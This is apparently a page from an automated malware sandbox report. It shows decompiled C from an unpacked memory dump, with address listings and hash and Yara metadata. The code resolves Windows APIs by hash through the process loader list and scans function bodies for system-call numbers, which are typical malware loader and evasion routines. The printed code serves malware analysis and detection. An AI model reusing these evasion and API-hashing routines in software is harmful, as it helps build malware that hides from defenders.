								_t477[2] = _t261 + 1;
								_t395 = E6E9F3044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6e9fd2e4 = 1;
					E6E9EF5A8( &(_t535[0x38]), 0);
					E6E9EF5A8( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6E9EF4E0( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6E9F3044(0xfe338407, 0x790529cb, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6E9EF84C( &(_t535[0xc]), E6E9EF4F0( &(_t535[8])) + 0x14);
								_t369 = E6E9EF4E0( &(_t535[0xc]), E6E9EF4F0( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6E9EF678( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6E9EF5A8( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6E9EF678( &(_t535[8]));
							E6E9EF678( &(_t535[0x164]));
							E6E9EF5A8( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6E9EF5A8( &(_t535[0x20]), 0);
							_push(0xfe338407);
							_t289 = E6E9F1D58(0xfe338407);
							_t290 = E6E9F1310( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6E9F1C90( &(_t535[0x164]), 0xfe338407);
							_t518 =  &(_t535[0x178]);
							E6E9ED058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6E9F5CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6E9F5CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6E9F8DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6E9EF678( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6E9EBB88( &(_t535[0x110]));
							}
							E6E9ED020( &(_t535[0x104]));
							E6E9ED020(_t518);
							E6E9ED020( &(_t535[0x15c]));
							E6E9ED020( &(_t535[0x154]));
							E6E9F90C4( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6E9EF63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6E9F9088( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6E9EF4E0( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6E9EF4F0( &(_t535[0x44]));
								_t519 =  *(0x6e9fbd40 + _t381 * 4);
								_t531 = E6E9F9054( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6E9F87C0( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6E9EF4F0( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6E9EF500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6E9EF4F0( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6E9EF84C( &(_t535[0x20]), E6E9EF4F0( &(_t535[0x1c])) + 8);
										E6E9EF4E0( &(_t535[0x20]), E6E9EF4F0( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6E9F3154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6E9EF84C( &(_t535[0x48]), _t535[0x70]);
									E6E9F3154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6E9EF864( &(_t535[0x44]), _t563);
									E6E9EF864( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6E9F9114( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6E9F90DC( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6E9EF678( &(_t535[0x144]));
									E6E9EF678( &(_t535[0x134]));
									goto L38;
								}
								 *0x6e9fd2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6E9EF678( &(_t535[0x11c]));
							E6E9F8E40(_t381,  &(_t535[0xd8]));
							E6E9EF678( &(_t535[0x1c]));
							E6E9EF678( &(_t535[0x44]));
							E6E9EF678( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6E9EF4E0( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6E9EF84C( &(_t535[0x38]), E6E9EF4F0( &(_t535[0x34])) + 0x14);
							_t347 = E6E9EF4E0( &(_t535[0x38]), E6E9EF4F0( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6E9EF4E0( &(_t535[0xc]), _t62);
						_t455 = E6E9EF4E0( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6e9f146c
0x6e9f1473
0x6e9f1476
0x6e9f147d
0x6e9f1bff
0x6e9f1bff
0x6e9f1483
0x6e9f148e
0x6e9f19cd
0x6e9f19d1
0x00000000
0x6e9f1c50
0x6e9f19d7
0x6e9f19da
0x6e9f19dd
0x6e9f19e7
0x6e9f19f6
0x6e9f19f8
0x6e9f19ff
0x6e9f1be9
0x6e9f1beb
0x6e9f1bee
0x6e9f1bf2
0x00000000
0x6e9f1bf2
0x6e9f1a0e
0x6e9f1a19
0x6e9f1a20
0x6e9f1a23
0x6e9f1a25
0x6e9f1a28
0x6e9f1a2b
0x6e9f1a31
0x6e9f1a3f
0x6e9f1a4f
0x6e9f1a74
0x6e9f1a85
0x6e9f1a88
0x6e9f1a8a
0x6e9f1aee
0x6e9f1af1
0x6e9f1af1
0x6e9f1af3
0x6e9f1af6
0x6e9f1afa
0x6e9f1afa
0x6e9f1afe
0x00000000
0x00000000
0x6e9f1b0b
0x6e9f1b11
0x6e9f1b45
0x6e9f1b4b
0x6e9f1b4d
0x6e9f1c1c
0x6e9f1c24
0x6e9f1c27
0x6e9f1c29
0x6e9f1c40
0x6e9f1c40
0x6e9f1c2b
0x6e9f1c2f
0x6e9f1c34
0x6e9f1c34
0x6e9f1c42
0x6e9f1c48
0x6e9f1b67
0x6e9f1b67
0x6e9f1b69
0x6e9f1b69
0x6e9f1b6b
0x6e9f1b6b
0x6e9f1b70
0x00000000
0x00000000
0x6e9f1b72
0x6e9f1b73
0x6e9f1b76
0x6e9f1b79
0x00000000
0x00000000
0x6e9f1b85
0x6e9f1b88
0x6e9f1b8a
0x6e9f1ba1
0x6e9f1ba1
0x6e9f1b8c
0x6e9f1b90
0x6e9f1b95
0x6e9f1b95
0x6e9f1bae
0x6e9f1bb1
0x6e9f1bba
0x6e9f1bbd
0x6e9f1be0
0x6e9f1be4
0x00000000
0x6e9f1be4
0x6e9f1bc5
0x6e9f1bc5
0x6e9f1bd1
0x6e9f1bd4
0x6e9f1bdd
0x00000000
0x6e9f1bdd
0x6e9f1b53
0x6e9f1b53
0x6e9f1b63
0x6e9f1b63
0x6e9f1b65
0x00000000
0x00000000
0x6e9f1b5b
0x6e9f1b5d
0x6e9f1b5d
0x00000000
0x6e9f1b63
0x6e9f1b13
0x6e9f1b1b
0x6e9f1b3b
0x6e9f1b1d
0x6e9f1b1d
0x6e9f1b25
0x6e9f1b2e
0x6e9f1b2e
0x6e9f1b25
0x00000000
0x6e9f1b1b
0x6e9f1a8c
0x6e9f1a93
0x00000000
0x00000000
0x6e9f1aa0
0x6e9f1aa6
0x6e9f1aab
0x6e9f1ab2
0x6e9f1ab6
0x6e9f1acb
0x6e9f1acd
0x6e9f1acf
0x6e9f1ad5
0x6e9f1ae3
0x6e9f1ae3
0x6e9f1ae9
0x00000000
0x6e9f1ae9
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f1a33
0x6e9f1a33
0x6e9f1a33
0x6e9f1a34
0x6e9f1a37
0x6e9f1a3b
0x00000000
0x6e9f1a51
0x6e9f1a54
0x6e9f1a57
0x6e9f1a60
0x6e9f1a63
0x6e9f1a64
0x6e9f1a66
0x00000000
0x6e9f14a1
0x6e9f14a3
0x6e9f14a8
0x6e9f14b3
0x6e9f14c1
0x6e9f14d4
0x6e9f14e1
0x6e9f14ea
0x6e9f14ee
0x6e9f14f2
0x6e9f153a
0x6e9f153a
0x6e9f153c
0x6e9f1543
0x00000000
0x00000000
0x6e9f155c
0x6e9f1564
0x6e9f1568
0x6e9f157d
0x6e9f1581
0x6e9f1585
0x6e9f158e
0x6e9f1594
0x6e9f1597
0x6e9f159b
0x6e9f15a3
0x6e9f15a5
0x6e9f15a9
0x6e9f15b0
0x6e9f15b9
0x6e9f15b9
0x6e9f15bd
0x6e9f15d2
0x6e9f15e8
0x6e9f15f5
0x6e9f15f6
0x6e9f15f6
0x6e9f15f8
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f15b2
0x6e9f15b2
0x6e9f15b2
0x6e9f15b3
0x6e9f15b4
0x00000000
0x6e9f15b2
0x6e9f1577
0x6e9f157b
0x00000000
0x00000000
0x00000000
0x6e9f15fc
0x6e9f15fc
0x6e9f15fd
0x6e9f1600
0x6e9f160a
0x6e9f160a
0x6e9f160e
0x6e9f1615
0x6e9f1670
0x6e9f1675
0x6e9f16c8
0x6e9f16c8
0x6e9f16cc
0x6e9f16d0
0x6e9f14fa
0x6e9f14fd
0x6e9f1502
0x6e9f1508
0x6e9f150b
0x6e9f1512
0x6e9f1516
0x6e9f151d
0x6e9f1526
0x6e9f152a
0x6e9f152e
0x6e9f1534
0x00000000
0x00000000
0x00000000
0x6e9f1534
0x6e9f16da
0x6e9f16e6
0x6e9f16f1
0x6e9f16f8
0x6e9f1701
0x6e9f170b
0x6e9f170c
0x6e9f171a
0x6e9f171f
0x6e9f1720
0x6e9f172d
0x6e9f1732
0x6e9f1744
0x6e9f1749
0x6e9f174e
0x6e9f1760
0x6e9f1772
0x6e9f1777
0x6e9f1782
0x6e9f1789
0x6e9f178e
0x6e9f1796
0x6e9f179f
0x6e9f179f
0x6e9f17ab
0x6e9f17b2
0x6e9f17be
0x6e9f17ca
0x6e9f17d8
0x6e9f17e9
0x6e9f17f0
0x6e9f17f5
0x6e9f17fe
0x6e9f1803
0x6e9f1805
0x6e9f1809
0x6e9f180d
0x6e9f181a
0x6e9f1827
0x6e9f182b
0x6e9f183f
0x6e9f1843
0x00000000
0x00000000
0x6e9f1858
0x6e9f185a
0x6e9f1862
0x6e9f185f
0x6e9f185f
0x6e9f185f
0x6e9f1866
0x6e9f1868
0x6e9f186e
0x6e9f1874
0x6e9f18d0
0x6e9f18d9
0x6e9f18dd
0x6e9f18ea
0x6e9f18f3
0x6e9f18f8
0x6e9f18fc
0x6e9f18ff
0x6e9f1960
0x6e9f1976
0x6e9f1981
0x6e9f1982
0x6e9f1983
0x6e9f1987
0x6e9f198a
0x6e9f1c0a
0x6e9f1c0d
0x6e9f1c0d
0x00000000
0x6e9f198a
0x6e9f1909
0x6e9f1919
0x6e9f1922
0x6e9f192b
0x6e9f1934
0x6e9f1935
0x6e9f1936
0x6e9f193b
0x6e9f1943
0x6e9f194b
0x00000000
0x00000000
0x00000000
0x6e9f194d
0x6e9f187d
0x6e9f1882
0x6e9f1886
0x6e9f1886
0x6e9f188a
0x6e9f188d
0x00000000
0x00000000
0x6e9f18ae
0x6e9f18b0
0x6e9f18b4
0x6e9f18b6
0x00000000
0x00000000
0x6e9f18b8
0x6e9f18bf
0x6e9f18cb
0x00000000
0x6e9f18cb
0x6e9f1892
0x00000000
0x6e9f1990
0x6e9f1990
0x6e9f1991
0x6e9f19a1
0x6e9f19ad
0x6e9f19b6
0x6e9f19bf
0x6e9f19c8
0x00000000
0x6e9f19c8
0x6e9f1677
0x6e9f1679
0x6e9f167b
0x6e9f1680
0x6e9f1685
0x6e9f1698
0x6e9f16ae
0x6e9f16b7
0x6e9f16b8
0x6e9f16b8
0x6e9f16ba
0x6e9f16bb
0x6e9f16be
0x6e9f16c2
0x00000000
0x6e9f167b
0x6e9f1617
0x6e9f1621
0x6e9f1622
0x6e9f1622
0x6e9f162f
0x6e9f163b
0x6e9f163d
0x6e9f163f
0x6e9f1643
0x6e9f1653
0x6e9f1653
0x6e9f165a
0x6e9f165d
0x6e9f165e
0x6e9f1662
0x6e9f166c
0x00000000
0x6e9f166c

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4bdf1853a7b5dc6998ca141ed95eda313499819954e346d5d3e6c90a29fe369
Instruction ID: e9d46feded1c87591b6f770771e6b27538cb3d7d2ff22cea25cee1a86c3330bd
Opcode Fuzzy Hash: e4bdf1853a7b5dc6998ca141ed95eda313499819954e346d5d3e6c90a29fe369
Instruction Fuzzy Hash: 18326DB0508345CFC715DFA9D890AEAB7E8BFD5308F10492DE59587292EB30D94ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F1D58, Relevance: .3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E6E9F1D58(intOrPtr __eax) {
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				signed int _t76;
				signed char _t84;
				signed char _t86;
				signed char _t89;
				signed char _t92;
				signed char _t95;
				signed char* _t99;
				void* _t113;
				signed char _t114;
				signed char _t116;
				signed char _t118;
				intOrPtr _t119;
				signed char _t120;
				signed char _t127;
				signed char _t129;
				signed char _t130;
				signed char _t143;
				signed char _t145;
				signed char _t146;
				signed int _t147;
				signed char _t148;
				void* _t151;
				signed char _t155;
				signed char _t159;
				signed char _t165;
				signed char _t166;
				signed char _t167;
				signed char _t168;
				void* _t170;
				void* _t171;
				intOrPtr _t172;
				signed char _t173;
				intOrPtr _t174;
				intOrPtr* _t175;
				signed char _t176;
				signed char _t177;
				signed char _t178;
				signed char _t179;
				signed char* _t181;

				_t119 = __eax;
				_t143 =  *0x6e9fd21c; // 0x4655c50
				if(_t143 == 0x76470dcb) {
					_t143 = 0;
					 *0x6e9fd21c = 0;
				}
				if(_t119 != 0xfe338407) {
					L4:
					_t174 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
					if(_t119 != 0xa7e21d79) {
						while(1) {
							L10:
							__eflags = _t143;
							if(_t143 == 0) {
								break;
							}
							_t72 = 0;
							_t120 = 0;
							__eflags = 0;
							while(1) {
								__eflags = _t119 -  *((intOrPtr*)(_t120 + _t143 + 8));
								if(_t119 ==  *((intOrPtr*)(_t120 + _t143 + 8))) {
									break;
								}
								_t72 = _t72 + 1;
								_t120 = _t120 + 0x10;
								__eflags = _t72 - 0x10;
								if(_t72 < 0x10) {
									continue;
								}
								_t143 =  *(_t143 + 0x100);
								goto L10;
							}
							return  *((intOrPtr*)(_t120 + _t143 + 0xc));
						}
						__eflags = _t119 - 0x94e21d79;
						if(_t119 != 0x94e21d79) {
							_t74 =  *((intOrPtr*)(_t174 + 0xc));
							_t175 =  *((intOrPtr*)(_t74 + 0xc));
							_t181[4] =  *(_t74 + 0x10);
							while(1) {
								_t172 =  *((intOrPtr*)(_t175 + 0x30));
								_t75 = 0;
								__eflags = 0;
								while(1) {
									_t145 =  *(_t172 + _t75 * 2) & 0x0000ffff;
									_t181[0x1c + _t75 * 2] = _t145;
									__eflags = _t145;
									_t146 =  *(_t175 + 0x2c) & 0x0000ffff;
									if(_t145 == 0) {
										break;
									}
									_t75 = _t75 + 1;
									__eflags = _t75 - _t146;
									if(_t75 <= _t146) {
										continue;
									}
									break;
								}
								__eflags = _t146;
								_t147 = 0;
								if(_t146 <= 0) {
									L34:
									_t76 = E6E9F4FD4( &(_t181[0x13c]), _t147);
									__eflags = _t119 - (_t76 ^ 0x7af3da47);
									if(_t119 == (_t76 ^ 0x7af3da47)) {
										_t173 =  *(_t175 + 0x18);
										__eflags = _t173;
										if(_t173 == 0) {
											L55:
											return _t173;
										}
										L38:
										_t148 =  *0x6e9fd2ec; // 0x0
										__eflags = _t148 |  *0x6e9fd2ed;
										if((_t148 |  *0x6e9fd2ed) == 0) {
											_t176 =  *0x6e9fd21c; // 0x4655c50
											__eflags = _t176;
											if(_t176 == 0) {
												 *0x6e9fd2ec = 1;
												_t177 = E6E9F35F4(0x104);
												__eflags = _t177;
												if(_t177 == 0) {
													_t177 = 0;
													__eflags = 0;
													L62:
													 *0x6e9fd21c = _t177;
													 *0x6e9fd214 = E6E9F3044(0xfe338407, 0xb0386671, 0xfe338407, 0xfe338407);
													 *0x6e9fd2ec = 0;
													L45:
													_t151 = 0;
													_t165 = 0;
													__eflags = 0;
													while(1) {
														__eflags =  *(_t165 + _t177 + 8);
														if( *(_t165 + _t177 + 8) == 0) {
															break;
														}
														_t151 = _t151 + 1;
														_t165 = _t165 + 0x10;
														__eflags = _t151 - 0x10;
														if(_t151 < 0x10) {
															continue;
														}
														_t84 = E6E9F35F4(0x104);
														_t181[4] = _t84;
														__eflags =  *_t181;
														if( *_t181 == 0) {
															 *_t181 = 0;
															L53:
															 *( *_t181 + 0xc) = _t173;
															E6E9ED03C( *_t181,  &(_t181[0x1c]));
															_t155 =  *_t181;
															 *((intOrPtr*)(_t155 + 8)) = _t119;
															 *(_t177 + 0x100) = _t155;
															goto L55;
														}
														_t167 = _t84;
														_t86 = 0x10;
														do {
															_t181[0x13c] = _t86;
															E6E9ECFC8(_t167, 0);
															 *((intOrPtr*)(_t167 + 8)) = 0;
															 *((intOrPtr*)(_t167 + 0xc)) = 0;
															_t167 = _t167 + 0x10;
															_t86 = _t181[0x138] - 1;
															__eflags = _t86;
														} while (_t86 != 0);
														 *( *_t181 + 0x100) = 0;
														goto L53;
													}
													_t166 = _t165 + _t177;
													__eflags = _t166;
													 *(_t166 + 0xc) = _t173;
													E6E9ED03C(_t166,  &(_t181[0x1c]));
													 *((intOrPtr*)(_t166 + 8)) = _t119;
													goto L55;
												}
												_t168 = _t177;
												_t89 = 0x10;
												do {
													_t181[4] = _t89;
													E6E9ECFC8(_t168, 0);
													 *((intOrPtr*)(_t168 + 8)) = 0;
													 *((intOrPtr*)(_t168 + 0xc)) = 0;
													_t168 = _t168 + 0x10;
													_t89 =  *_t181 - 1;
													__eflags = _t89;
												} while (_t89 != 0);
												 *(_t177 + 0x100) = 0;
												goto L62;
											}
											_t159 =  *(_t176 + 0x100);
											while(1) {
												__eflags = _t159;
												if(_t159 == 0) {
													goto L45;
												}
												_t177 = _t159;
												_t159 =  *(_t159 + 0x100);
											}
											goto L45;
										}
										__eflags = _t119 - 0xfe338407;
										if(_t119 == 0xfe338407) {
											 *0x6e9fd220 = _t173;
										}
										goto L55;
									}
									__eflags = _t175 - _t181[4];
									if(_t175 != _t181[4]) {
										_t175 =  *_t175;
										continue;
									}
									L36:
									_t173 = 0;
									goto L55;
								}
								_t92 = 0;
								__eflags = 0;
								while(1) {
									_t126 =  *((char*)(_t172 + _t147 * 2));
									 *_t181 = _t92;
									_t39 = _t126 - 0x41; // -81
									__eflags = _t39 - 0x19;
									_t40 = _t126 + 0x20; // 0x10
									_t127 =  <=  ? _t40 :  *((char*)(_t172 + _t147 * 2));
									_t181[_t147 + 0x13c] = _t127;
									_t95 =  *_t181;
									__eflags = _t127;
									if(_t127 == 0) {
										goto L34;
									}
									_t92 = _t95 + 1;
									_t147 = _t147 + 1;
									__eflags = _t92 - ( *(_t175 + 0x2c) & 0x0000ffff);
									if(_t92 < ( *(_t175 + 0x2c) & 0x0000ffff)) {
										continue;
									}
									goto L34;
								}
								goto L34;
							}
						}
						_t170 = E6E9F9A00();
						_t178 = 0;
						while(1) {
							_t129 = E6E9F3044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t129;
							if(_t129 == 0) {
								goto L16;
							}
							_t116 =  *_t129(0xffffffff, _t178, 0,  &(_t181[0x11c]), 0x1c, 0);
							__eflags = _t116;
							if(_t116 != 0) {
								goto L36;
							}
							L16:
							_t99 =  &(_t181[0x120]);
							_t173 =  *_t99;
							_t130 = _t99[8];
							__eflags = _t173 - _t170;
							if(_t173 > _t170) {
								L13:
								_t178 = _t178 + _t130;
								__eflags = _t178;
								continue;
							}
							__eflags = _t130 + _t173 - _t170;
							if(_t130 + _t173 <= _t170) {
								goto L13;
							}
							__eflags = _t173;
							if(_t173 == 0) {
								goto L55;
							}
							E6E9EF5A8( &(_t181[0x10]), 0x400);
							_t171 = E6E9EF4E0( &(_t181[0x10]), 0);
							_t179 = E6E9F3044(0xfe338407, 0x790529cb, 0xfe338407, 0xfe338407);
							__eflags = _t179;
							if(_t179 == 0) {
								L21:
								E6E9ED000( &(_t181[0xc]),  *((intOrPtr*)(_t171 + 4)), 0);
								__eflags = E6E9ED210( &(_t181[8]), 0x5c);
								if(__eflags != 0) {
									_push(0x5c);
									E6E9ED650( &(_t181[0xc]), __eflags,  &(_t181[0x1bc]));
									E6E9ED03C( &(_t181[8]), _t181[0x1bc]);
									E6E9ED020( &(_t181[0x1bc]));
								}
								E6E9EDE70( &(_t181[0x20]), _t181[4], 0);
								E6E9ED020( &(_t181[4]));
								L24:
								E6E9EF678( &(_t181[0xc]));
								goto L38;
							}
							 *_t181 = E6E9EF4E0( &(_t181[0x10]), 0);
							_t113 = E6E9EF4F0( &(_t181[0xc]));
							_t114 =  *_t179(0xffffffff, _t173, 2, _t181[8], _t113, 0);
							__eflags = _t114;
							if(_t114 != 0) {
								goto L24;
							}
							goto L21;
						}
					}
					return  *((intOrPtr*)(_t174 + 8));
				} else {
					_t118 =  *0x6e9fd220; // 0x775e0000
					if(_t118 != 0xe86b6198) {
						return _t118;
					}
					goto L4;
				}
			}

0x6e9f1d62
0x6e9f1d64
0x6e9f1d70
0x6e9f1d72
0x6e9f1d74
0x6e9f1d74
0x6e9f1d80
0x6e9f1d92
0x6e9f1d98
0x6e9f1da1
0x6e9f1dc8
0x6e9f1dc8
0x6e9f1dc8
0x6e9f1dca
0x00000000
0x00000000
0x6e9f1dab
0x6e9f1dad
0x6e9f1dad
0x6e9f1daf
0x6e9f1daf
0x6e9f1db3
0x00000000
0x00000000
0x6e9f1db9
0x6e9f1dba
0x6e9f1dbd
0x6e9f1dc0
0x00000000
0x00000000
0x6e9f1dc2
0x00000000
0x6e9f1dc2
0x00000000
0x6e9f20f1
0x6e9f1dcc
0x6e9f1dd2
0x6e9f1efe
0x6e9f1f04
0x6e9f1f07
0x6e9f1f10
0x6e9f1f10
0x6e9f1f13
0x6e9f1f13
0x6e9f1f15
0x6e9f1f15
0x6e9f1f19
0x6e9f1f1e
0x6e9f1f20
0x6e9f1f24
0x00000000
0x00000000
0x6e9f1f26
0x6e9f1f27
0x6e9f1f29
0x00000000
0x00000000
0x00000000
0x6e9f1f29
0x6e9f1f2b
0x6e9f1f2f
0x6e9f1f30
0x6e9f1f62
0x6e9f1f69
0x6e9f1f73
0x6e9f1f75
0x6e9f1f84
0x6e9f1f87
0x6e9f1f89
0x6e9f2071
0x00000000
0x6e9f2071
0x6e9f1f8f
0x6e9f1f8f
0x6e9f1f95
0x6e9f1f9b
0x6e9f1fb4
0x6e9f1fba
0x6e9f1fbc
0x6e9f2085
0x6e9f2091
0x6e9f2094
0x6e9f2096
0x6e9f20c7
0x6e9f20c7
0x6e9f20c9
0x6e9f20d5
0x6e9f20e0
0x6e9f20e5
0x6e9f1fd6
0x6e9f1fd6
0x6e9f1fd8
0x6e9f1fd8
0x6e9f1fda
0x6e9f1fda
0x6e9f1fdf
0x00000000
0x00000000
0x6e9f1fe1
0x6e9f1fe2
0x6e9f1fe5
0x6e9f1fe8
0x00000000
0x00000000
0x6e9f1fef
0x6e9f1ff4
0x6e9f1ff9
0x6e9f1ffd
0x6e9f2038
0x6e9f203f
0x6e9f2047
0x6e9f204a
0x6e9f204f
0x6e9f2052
0x6e9f2055
0x00000000
0x6e9f2055
0x6e9f1fff
0x6e9f2003
0x6e9f2004
0x6e9f2008
0x6e9f200f
0x6e9f201d
0x6e9f2020
0x6e9f2023
0x6e9f2026
0x6e9f2026
0x6e9f2026
0x6e9f202c
0x00000000
0x6e9f202c
0x6e9f205d
0x6e9f205d
0x6e9f2066
0x6e9f2069
0x6e9f206e
0x00000000
0x6e9f206e
0x6e9f2098
0x6e9f209c
0x6e9f209d
0x6e9f20a1
0x6e9f20a5
0x6e9f20af
0x6e9f20b2
0x6e9f20b5
0x6e9f20b8
0x6e9f20b8
0x6e9f20b8
0x6e9f20bb
0x00000000
0x6e9f20bb
0x6e9f1fc2
0x6e9f1fd2
0x6e9f1fd2
0x6e9f1fd4
0x00000000
0x00000000
0x6e9f1fca
0x6e9f1fcc
0x6e9f1fcc
0x00000000
0x6e9f1fd2
0x6e9f1f9d
0x6e9f1fa3
0x6e9f1fa9
0x6e9f1fa9
